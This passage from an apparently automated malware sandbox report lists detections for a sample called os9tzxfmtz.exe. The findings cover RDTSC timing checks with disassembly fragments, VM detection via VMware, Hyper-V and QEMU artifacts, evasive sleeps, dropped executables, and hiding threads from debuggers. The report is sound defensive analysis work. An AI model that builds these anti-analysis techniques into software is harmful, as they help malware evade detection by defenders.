Source: C:\Users\user\Desktop\os9tzxfmtz.exe RDTSC instruction interceptor: First address: 000000000228A4D8 second address: 000000000228A4D8 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 cmp edx, dword ptr [ebp+44h] 0x00000006 jne 00007F6704CA1C85h 0x00000008 jmp 00007F6704CA1D2Eh 0x0000000a test edi, 9279C6F4h 0x00000010 sub edx, 04h 0x00000013 xor dword ptr [edx], ecx 0x00000015 jmp 00007F6704CA1D36h 0x00000017 pushad 0x00000018 mov edx, 000000C6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\os9tzxfmtz.exe RDTSC instruction interceptor: First address: 0000000002283F33 second address: 0000000002283F33 instructions:
Source: C:\Users\user\Desktop\os9tzxfmtz.exe RDTSC instruction interceptor: First address: 0000000002283FF5 second address: 0000000002283FF5 instructions:
Source: C:\Users\user\Desktop\os9tzxfmtz.exe RDTSC instruction interceptor: First address: 0000000000568806 second address: 0000000000568806 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F6704C9BDCCh 0x0000001d popad 0x0000001e call 00007F6704C9B746h 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Desktop\os9tzxfmtz.exe RDTSC instruction interceptor: First address: 0000000000565908 second address: 0000000000564BD7 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b test cx, cx 0x0000000e ret 0x0000000f jmp 00007F6704CA1D2Eh 0x00000011 cmp cx, bx 0x00000014 call 00007F6704CA50B3h 0x00000019 mov eax, dword ptr fs:[00000030h] 0x0000001f mov eax, dword ptr [eax+10h] 0x00000022 add eax, 40h 0x00000025 add eax, 04h 0x00000028 mov eax, dword ptr [eax] 0x0000002a ret 0x0000002b mov dword ptr [ebp+4Ch], eax 0x0000002e cmp ebx, ecx 0x00000030 call 00007F6704CA57BCh 0x00000035 push dword ptr [ebp+20h] 0x00000038 pop dword ptr [ebp+0000012Ch] 0x0000003e mov dword ptr [ebp+68h], 00000000h 0x00000045 jmp 00007F6704CA3030h 0x0000004a call 00007F6704CA0A09h 0x0000004f jmp 00007F6704CA1D32h 0x00000051 pushad 0x00000052 mov edi, 00000036h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\os9tzxfmtz.exe RDTSC instruction interceptor: First address: 000000000056A4D8 second address: 000000000056A4D8 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 cmp edx, dword ptr [ebp+44h] 0x00000006 jne 00007F6704C9B545h 0x00000008 jmp 00007F6704C9B5EEh 0x0000000a test edi, 9279C6F4h 0x00000010 sub edx, 04h 0x00000013 xor dword ptr [edx], ecx 0x00000015 jmp 00007F6704C9B5F6h 0x00000017 pushad 0x00000018 mov edx, 000000C6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\os9tzxfmtz.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\os9tzxfmtz.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains capabilities to detect virtual machines
Source: C:\Windows\System\svchost.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02289F5D rdtsc 1_2_02289F5D
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System\svchost.exe Window / User API: threadDelayed 489
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\mrsys.exe
Source: C:\Windows\System\svchost.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\stsys.exe
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe TID: 6252 Thread sleep count: 31 > 30
Source: C:\Windows\System\explorer.exe TID: 6388 Thread sleep count: 151 > 30
Source: C:\Windows\System\svchost.exe TID: 6444 Thread sleep count: 489 > 30
Source: C:\Windows\System32\svchost.exe TID: 6656 Thread sleep time: -30000s >= -30000s
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: svchost.exe, 00000007.00000002.499902779.0000017AF2861000.00000004.00000001.sdmp Binary or memory string: "@Hyper-V RAW
Source: at.exe, 00000009.00000002.271752849.0000000003390000.00000002.00000001.sdmp, at.exe, 0000000B.00000002.273246239.00000000036F0000.00000002.00000001.sdmp, at.exe, 0000000D.00000002.275410205.0000000003520000.00000002.00000001.sdmp, at.exe, 0000000F.00000002.276667282.0000000002B90000.00000002.00000001.sdmp, at.exe, 00000011.00000002.278275382.0000000002900000.00000002.00000001.sdmp, at.exe, 00000013.00000002.280308756.0000000003130000.00000002.00000001.sdmp, at.exe, 00000015.00000002.280430889.00000000037C0000.00000002.00000001.sdmp, at.exe, 00000017.00000002.281374213.00000000033E0000.00000002.00000001.sdmp, at.exe, 0000001A.00000002.283647922.0000000002830000.00000002.00000001.sdmp, at.exe, 0000001E.00000002.284905605.0000000003580000.00000002.00000001.sdmp, at.exe, 00000020.00000002.287265699.0000000002F30000.00000002.00000001.sdmp, svchost.exe, 00000021.00000002.497133246.00000240A2B40000.00000002.00000001.sdmp, at.exe, 00000023.00000002.288280375.00000000028B0000.00000002.00000001.sdmp, at.exe, 00000025.00000002.289269510.00000000029A0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000004.00000002.367343924.00000000007E8000.00000004.00000020.sdmp, svchost.exe, 00000007.00000002.499878626.0000017AF284E000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000019.00000002.494012893.000002A269202000.00000004.00000001.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: explorer.exe, 00000004.00000002.367258347.00000000007A1000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWH
Source: at.exe, 00000009.00000002.271752849.0000000003390000.00000002.00000001.sdmp, at.exe, 0000000B.00000002.273246239.00000000036F0000.00000002.00000001.sdmp, at.exe, 0000000D.00000002.275410205.0000000003520000.00000002.00000001.sdmp, at.exe, 0000000F.00000002.276667282.0000000002B90000.00000002.00000001.sdmp, at.exe, 00000011.00000002.278275382.0000000002900000.00000002.00000001.sdmp, at.exe, 00000013.00000002.280308756.0000000003130000.00000002.00000001.sdmp, at.exe, 00000015.00000002.280430889.00000000037C0000.00000002.00000001.sdmp, at.exe, 00000017.00000002.281374213.00000000033E0000.00000002.00000001.sdmp, at.exe, 0000001A.00000002.283647922.0000000002830000.00000002.00000001.sdmp, at.exe, 0000001E.00000002.284905605.0000000003580000.00000002.00000001.sdmp, at.exe, 00000020.00000002.287265699.0000000002F30000.00000002.00000001.sdmp, svchost.exe, 00000021.00000002.497133246.00000240A2B40000.00000002.00000001.sdmp, at.exe, 00000023.00000002.288280375.00000000028B0000.00000002.00000001.sdmp, at.exe, 00000025.00000002.289269510.00000000029A0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: os9tzxfmtz.exe Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: at.exe, 00000009.00000002.271752849.0000000003390000.00000002.00000001.sdmp, at.exe, 0000000B.00000002.273246239.00000000036F0000.00000002.00000001.sdmp, at.exe, 0000000D.00000002.275410205.0000000003520000.00000002.00000001.sdmp, at.exe, 0000000F.00000002.276667282.0000000002B90000.00000002.00000001.sdmp, at.exe, 00000011.00000002.278275382.0000000002900000.00000002.00000001.sdmp, at.exe, 00000013.00000002.280308756.0000000003130000.00000002.00000001.sdmp, at.exe, 00000015.00000002.280430889.00000000037C0000.00000002.00000001.sdmp, at.exe, 00000017.00000002.281374213.00000000033E0000.00000002.00000001.sdmp, at.exe, 0000001A.00000002.283647922.0000000002830000.00000002.00000001.sdmp, at.exe, 0000001E.00000002.284905605.0000000003580000.00000002.00000001.sdmp, at.exe, 00000020.00000002.287265699.0000000002F30000.00000002.00000001.sdmp, svchost.exe, 00000021.00000002.497133246.00000240A2B40000.00000002.00000001.sdmp, at.exe, 00000023.00000002.288280375.00000000028B0000.00000002.00000001.sdmp, at.exe, 00000025.00000002.289269510.00000000029A0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 00000019.00000002.494093401.000002A269228000.00000004.00000001.sdmp, svchost.exe, 00000021.00000002.493270876.00000240A1E40000.00000004.00000001.sdmp, svchost.exe, 00000027.00000002.493190369.000001E1C2829000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: at.exe, 00000009.00000002.271752849.0000000003390000.00000002.00000001.sdmp, at.exe, 0000000B.00000002.273246239.00000000036F0000.00000002.00000001.sdmp, at.exe, 0000000D.00000002.275410205.0000000003520000.00000002.00000001.sdmp, at.exe, 0000000F.00000002.276667282.0000000002B90000.00000002.00000001.sdmp, at.exe, 00000011.00000002.278275382.0000000002900000.00000002.00000001.sdmp, at.exe, 00000013.00000002.280308756.0000000003130000.00000002.00000001.sdmp, at.exe, 00000015.00000002.280430889.00000000037C0000.00000002.00000001.sdmp, at.exe, 00000017.00000002.281374213.00000000033E0000.00000002.00000001.sdmp, at.exe, 0000001A.00000002.283647922.0000000002830000.00000002.00000001.sdmp, at.exe, 0000001E.00000002.284905605.0000000003580000.00000002.00000001.sdmp, at.exe, 00000020.00000002.287265699.0000000002F30000.00000002.00000001.sdmp, svchost.exe, 00000021.00000002.497133246.00000240A2B40000.00000002.00000001.sdmp, at.exe, 00000023.00000002.288280375.00000000028B0000.00000002.00000001.sdmp, at.exe, 00000025.00000002.289269510.00000000029A0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\AppData\Local\icsys.icn.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to hide a thread from the debugger
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02280A61 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,0228A5E4,F21FD920,02280997 1_2_02280A61
Hides threads from debuggers
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Thread information set: HideFromDebugger
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02289F5D rdtsc 1_2_02289F5D
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02284DE5 LdrInitializeThunk, 1_2_02284DE5
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_0228906B mov eax, dword ptr fs:[00000030h] 1_2_0228906B
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02282E3F mov eax, dword ptr fs:[00000030h] 1_2_02282E3F
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02282651 mov eax, dword ptr fs:[00000030h] 1_2_02282651
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02287EE5 mov eax, dword ptr fs:[00000030h] 1_2_02287EE5
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02287F4B mov eax, dword ptr fs:[00000030h] 1_2_02287F4B
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02284443 mov eax, dword ptr fs:[00000030h] 1_2_02284443
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_022890AB mov eax, dword ptr fs:[00000030h] 1_2_022890AB
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_022890B7 mov eax, dword ptr fs:[00000030h] 1_2_022890B7
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02286C83 mov eax, dword ptr fs:[00000030h] 1_2_02286C83
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_022890F7 mov eax, dword ptr fs:[00000030h] 1_2_022890F7
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02289137 mov eax, dword ptr fs:[00000030h] 1_2_02289137
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02283168 mov eax, dword ptr fs:[00000030h] 1_2_02283168
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02283166 mov eax, dword ptr fs:[00000030h] 1_2_02283166
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_022831AF mov eax, dword ptr fs:[00000030h] 1_2_022831AF
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E4A2C mov eax, dword ptr fs:[00000030h] 29_2_1E3E4A2C
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E4A2C mov eax, dword ptr fs:[00000030h] 29_2_1E3E4A2C
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E434257 mov eax, dword ptr fs:[00000030h] 29_2_1E434257
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3AE620 mov eax, dword ptr fs:[00000030h] 29_2_1E3AE620
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3C3A1C mov eax, dword ptr fs:[00000030h] 29_2_1E3C3A1C
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3DA61C mov eax, dword ptr fs:[00000030h] 29_2_1E3DA61C
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3DA61C mov eax, dword ptr fs:[00000030h] 29_2_1E3DA61C
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E45B260 mov eax, dword ptr fs:[00000030h] 29_2_1E45B260
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E45B260 mov eax, dword ptr fs:[00000030h] 29_2_1E45B260
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E478A62 mov eax, dword ptr fs:[00000030h] 29_2_1E478A62
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3A5210 mov eax, dword ptr fs:[00000030h] 29_2_1E3A5210
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3A5210 mov ecx, dword ptr fs:[00000030h] 29_2_1E3A5210
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3A5210 mov eax, dword ptr fs:[00000030h] 29_2_1E3A5210
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3A5210 mov eax, dword ptr fs:[00000030h] 29_2_1E3A5210
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3AAA16 mov eax, dword ptr fs:[00000030h] 29_2_1E3AAA16
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3AAA16 mov eax, dword ptr fs:[00000030h] 29_2_1E3AAA16
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3B8A0A mov eax, dword ptr fs:[00000030h] 29_2_1E3B8A0A
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3AC600 mov eax, dword ptr fs:[00000030h] 29_2_1E3AC600
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3AC600 mov eax, dword ptr fs:[00000030h] 29_2_1E3AC600
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3AC600 mov eax, dword ptr fs:[00000030h] 29_2_1E3AC600
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D8E00 mov eax, dword ptr fs:[00000030h] 29_2_1E3D8E00
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E927A mov eax, dword ptr fs:[00000030h] 29_2_1E3E927A
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E461608 mov eax, dword ptr fs:[00000030h] 29_2_1E461608
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3CAE73 mov eax, dword ptr fs:[00000030h] 29_2_1E3CAE73
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3CAE73 mov eax, dword ptr fs:[00000030h] 29_2_1E3CAE73
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3CAE73 mov eax, dword ptr fs:[00000030h] 29_2_1E3CAE73
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3CAE73 mov eax, dword ptr fs:[00000030h] 29_2_1E3CAE73
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3CAE73 mov eax, dword ptr fs:[00000030h] 29_2_1E3CAE73
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3B766D mov eax, dword ptr fs:[00000030h] 29_2_1E3B766D
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3A9240 mov eax, dword ptr fs:[00000030h] 29_2_1E3A9240
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3A9240 mov eax, dword ptr fs:[00000030h] 29_2_1E3A9240
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3A9240 mov eax, dword ptr fs:[00000030h] 29_2_1E3A9240
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3A9240 mov eax, dword ptr fs:[00000030h] 29_2_1E3A9240
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E45FE3F mov eax, dword ptr fs:[00000030h] 29_2_1E45FE3F
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3B7E41 mov eax, dword ptr fs:[00000030h] 29_2_1E3B7E41
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3B7E41 mov eax, dword ptr fs:[00000030h] 29_2_1E3B7E41
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3B7E41 mov eax, dword ptr fs:[00000030h] 29_2_1E3B7E41
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3B7E41 mov eax, dword ptr fs:[00000030h] 29_2_1E3B7E41
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3B7E41 mov eax, dword ptr fs:[00000030h] 29_2_1E3B7E41
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3B7E41 mov eax, dword ptr fs:[00000030h] 29_2_1E3B7E41
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E45FEC0 mov eax, dword ptr fs:[00000030h] 29_2_1E45FEC0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3BAAB0 mov eax, dword ptr fs:[00000030h] 29_2_1E3BAAB0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3BAAB0 mov eax, dword ptr fs:[00000030h] 29_2_1E3BAAB0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3DFAB0 mov eax, dword ptr fs:[00000030h] 29_2_1E3DFAB0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E478ED6 mov eax, dword ptr fs:[00000030h] 29_2_1E478ED6
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3A52A5 mov eax, dword ptr fs:[00000030h] 29_2_1E3A52A5
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3A52A5 mov eax, dword ptr fs:[00000030h] 29_2_1E3A52A5
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3A52A5 mov eax, dword ptr fs:[00000030h] 29_2_1E3A52A5
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3A52A5 mov eax, dword ptr fs:[00000030h] 29_2_1E3A52A5
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3A52A5 mov eax, dword ptr fs:[00000030h] 29_2_1E3A52A5
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3DD294 mov eax, dword ptr fs:[00000030h] 29_2_1E3DD294
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3DD294 mov eax, dword ptr fs:[00000030h] 29_2_1E3DD294
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E43FE87 mov eax, dword ptr fs:[00000030h] 29_2_1E43FE87
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3B76E2 mov eax, dword ptr fs:[00000030h] 29_2_1E3B76E2
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D2AE4 mov eax, dword ptr fs:[00000030h] 29_2_1E3D2AE4
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D16E0 mov ecx, dword ptr fs:[00000030h] 29_2_1E3D16E0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E470EA5 mov eax, dword ptr fs:[00000030h] 29_2_1E470EA5
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E470EA5 mov eax, dword ptr fs:[00000030h] 29_2_1E470EA5
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E470EA5 mov eax, dword ptr fs:[00000030h] 29_2_1E470EA5
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E4246A7 mov eax, dword ptr fs:[00000030h] 29_2_1E4246A7
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D36CC mov eax, dword ptr fs:[00000030h] 29_2_1E3D36CC
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D2ACB mov eax, dword ptr fs:[00000030h] 29_2_1E3D2ACB
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E8EC7 mov eax, dword ptr fs:[00000030h] 29_2_1E3E8EC7
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3DE730 mov eax, dword ptr fs:[00000030h] 29_2_1E3DE730
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3A4F2E mov eax, dword ptr fs:[00000030h] 29_2_1E3A4F2E
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3A4F2E mov eax, dword ptr fs:[00000030h] 29_2_1E3A4F2E
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E478B58 mov eax, dword ptr fs:[00000030h] 29_2_1E478B58
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3CF716 mov eax, dword ptr fs:[00000030h] 29_2_1E3CF716
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E478F6A mov eax, dword ptr fs:[00000030h] 29_2_1E478F6A
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3DA70E mov eax, dword ptr fs:[00000030h] 29_2_1E3DA70E
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3DA70E mov eax, dword ptr fs:[00000030h] 29_2_1E3DA70E
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D3B7A mov eax, dword ptr fs:[00000030h] 29_2_1E3D3B7A
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D3B7A mov eax, dword ptr fs:[00000030h] 29_2_1E3D3B7A
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E47070D mov eax, dword ptr fs:[00000030h] 29_2_1E47070D
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E47070D mov eax, dword ptr fs:[00000030h] 29_2_1E47070D
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E43FF10 mov eax, dword ptr fs:[00000030h] 29_2_1E43FF10
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E43FF10 mov eax, dword ptr fs:[00000030h] 29_2_1E43FF10
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3ADB60 mov ecx, dword ptr fs:[00000030h] 29_2_1E3ADB60
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3BFF60 mov eax, dword ptr fs:[00000030h] 29_2_1E3BFF60
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E46131B mov eax, dword ptr fs:[00000030h] 29_2_1E46131B
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3AF358 mov eax, dword ptr fs:[00000030h] 29_2_1E3AF358
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3ADB40 mov eax, dword ptr fs:[00000030h] 29_2_1E3ADB40
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3BEF40 mov eax, dword ptr fs:[00000030h] 29_2_1E3BEF40
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E4253CA mov eax, dword ptr fs:[00000030h] 29_2_1E4253CA
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E4253CA mov eax, dword ptr fs:[00000030h] 29_2_1E4253CA
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D4BAD mov eax, dword ptr fs:[00000030h] 29_2_1E3D4BAD
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D4BAD mov eax, dword ptr fs:[00000030h] 29_2_1E3D4BAD
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D4BAD mov eax, dword ptr fs:[00000030h] 29_2_1E3D4BAD
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D2397 mov eax, dword ptr fs:[00000030h] 29_2_1E3D2397
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3DB390 mov eax, dword ptr fs:[00000030h] 29_2_1E3DB390
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3B8794 mov eax, dword ptr fs:[00000030h] 29_2_1E3B8794
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3B1B8F mov eax, dword ptr fs:[00000030h] 29_2_1E3B1B8F
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3B1B8F mov eax, dword ptr fs:[00000030h] 29_2_1E3B1B8F
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E45D380 mov ecx, dword ptr fs:[00000030h] 29_2_1E45D380
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E37F5 mov eax, dword ptr fs:[00000030h] 29_2_1E3E37F5
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E46138A mov eax, dword ptr fs:[00000030h] 29_2_1E46138A
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3CDBE9 mov eax, dword ptr fs:[00000030h] 29_2_1E3CDBE9
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E427794 mov eax, dword ptr fs:[00000030h] 29_2_1E427794
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E427794 mov eax, dword ptr fs:[00000030h] 29_2_1E427794
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E427794 mov eax, dword ptr fs:[00000030h] 29_2_1E427794
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D03E2 mov eax, dword ptr fs:[00000030h] 29_2_1E3D03E2
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D03E2 mov eax, dword ptr fs:[00000030h] 29_2_1E3D03E2
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D03E2 mov eax, dword ptr fs:[00000030h] 29_2_1E3D03E2
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D03E2 mov eax, dword ptr fs:[00000030h] 29_2_1E3D03E2
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D03E2 mov eax, dword ptr fs:[00000030h] 29_2_1E3D03E2
